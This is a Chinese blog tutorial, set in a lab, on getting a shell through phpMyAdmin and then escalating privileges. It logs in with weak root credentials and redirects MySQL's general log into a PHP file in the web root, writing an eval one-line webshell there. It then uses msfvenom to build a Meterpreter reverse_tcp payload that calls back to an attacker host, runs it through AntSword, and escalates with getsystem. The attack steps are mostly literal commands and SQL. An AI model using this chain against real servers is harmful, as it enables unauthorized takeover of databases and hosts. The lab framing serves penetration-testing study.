phpmyadmin getshell到提权

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量772 收藏
点赞数
分类专栏: 内网 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_fantasy/article/details/122424013
版权

环境准备:win7,phpstudy(包含phpmyadmin,可用旧版)

开始攻击:

通过弱口令,信息收集,爆破等方式获知phpmyadmin的账号密码是root root

开始登录目标机器上的phpmyadmin

2.检测MySQL全局变量(generallog、generallog file)的值。

在SQL处输入sql语句: SHOW VARIABLES LIKE ‘general%’

看到general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径。

已知general_log默认是关闭的,log日志存放的位置如图所示

开启general_log 的作用,开启它可以记录用户输入的每条命令,会把其保存在如图所示的一个log文件中,其实就是我们常说的日志文件。利用的思路是开启generallog之后把general_logfile的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。

这里需要知道网站目录,可以通过phpinfo信息查看得到。testshell.php是自己命名的用于存储新的log文件。

  1. set global general_log = "ON";
  2. SET global general_log_file=’C:/phpStudy/PHPTutorial/WWW/testshell.php’;

然后插入一句话木马,继续执行:

select '<?php eval($_POST[cmd]);?>';

接下来在网页访问testshell.php查看日志写入情况

但是在浏览器中看不到存在一句话木马的信息,但实际上已经写入,从win7靶机可以看到

接下来利用蚁剑连接,可以连接成功

打开虚拟终端,执行whoami得到的是一个administrator权限,这里我重命名了(忽略)

接下来通过msf提权,首先生成exe木马文件。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.194.181 LPORT=4444 -f exe >testshell.exe

注:LHOST处ip是kali的ip

设置监听,准备得到shell(此处生成木马目的是为了shell传递到msf)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.194.181

run

然后通过蚁剑上传testshell.exe

在蚁剑虚拟终端运行exe,可以看到msf上得到shell

最后直接getsystem进行提权

这里我直接提权成功了,如果没有成功的话可以使用UAC提权等方式

blue_fantasy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1793
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpmyadmin getshell
YouthBelief的博客
11-11 4975
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
phpMyAdmin getshell总结
zzgslh的博客
04-14 734
phpMyAdmin getshell总结 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 一、phpMyAdmin写权限(into outfile)getshell 利用条件 1.知道网站绝对路径 2.对web目录具有写入权限 3.secure_ file_ priv没有具体值 ...
phpmyadmin getshell总结
good good study
10-25 3203
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
PHPmyadmin Getshell
Grey的博客
07-21 6880
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
PhpMyadmin--getshell
qq_64664156的博客
09-20 390
phpMyAdmin通过MySQL日志文件getshell
phpmyadmin常见getshell的方法
Blue的博客
06-10 2479
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
phpmyadmin页面getshell
qq_52469895的博客
04-10 2376
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
phpmyadmin getshell的三种方式
luminous_you的博客
11-27 1223
phpmyadmin getshell的三种方式 方式一:包含日志文件getshell 方式二:into dumpfile 或者 into outfile 新表getshell https://www.cnblogs.com/muxueblog/p/13043768.html 方式三:数据库慢查询日志【主要针对日志量庞大,通过日志文件GETSHELL出现问题的情况】[如果登录了phpMyadmin没有办法直接写入文件,可以使用慢查询日志来进行文件写入。简单的说就是在mysql中,查询超过10秒的语句会被写
记一次tp5.0.24 getshell1
08-03
"记一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的记录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
pma:在Laravel Homestead盒子上安装phpMyAdmin的简单shell脚本
02-04
在本教程中,我们将详细讨论如何在Laravel Homestead上安装和配置phpMyAdmin,这将通过一个简单的shell脚本来实现。 首先,让我们了解Laravel Homestead。它是基于Vagrant和VirtualBox的,允许开发者在虚拟机中运行...
阿里云主机一键安装lamp、lnmp环境的shell脚本分享
01-20
阿里云主机一键安装lamp,lnmp,自动安装脚本,由阿里云主机分享 ...1、阿里云分享的一键安装lamp,lnmp,此安装...ftp:(yum/apt-get安装) phpwind:8.7 GBK phpmyadmin:4.1.8 2、请使用最新的一键安装包脚本安装,以前
Albatros:Docker Lammp
05-13
适用于debian-linux-gnu(x86_64)MySQL 5.6.24PhpMyAdmin 4.2.12deb2 ,MySql管理员。 节点v0.12.5 , 。 npm v2.11.2 , 。 PhantomJS 1.8.9 , 。 Python 3.4.3 , 。Docker安装用主机用户替换Ubuntu。 curl -...
记一次HW目标测试1
08-03
登录后,发现系统是通达OA2013,该系统存在直接变量覆盖的GETShell漏洞。GETShell漏洞是指攻击者通过操纵HTTP GET请求中的参数值,使程序在处理时意外覆盖了内部变量,从而可能执行恶意代码。 为了利用这个漏洞,...
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 308
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 939
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 432
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
ecshop网站部署
qq_63926306的博客
07-24 378
ecshop网站部署
shell脚本安装phpmyadmin
06-02
- Debian/Ubuntu:apt-get install phpmyadmin - CentOS/Fedora:yum install phpMyAdmin 5.在安装期间,你可能会被要求输入mysql数据库管理员的用户名和密码。如果你还没有设置它们,请先在mysql中设置一个管理员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值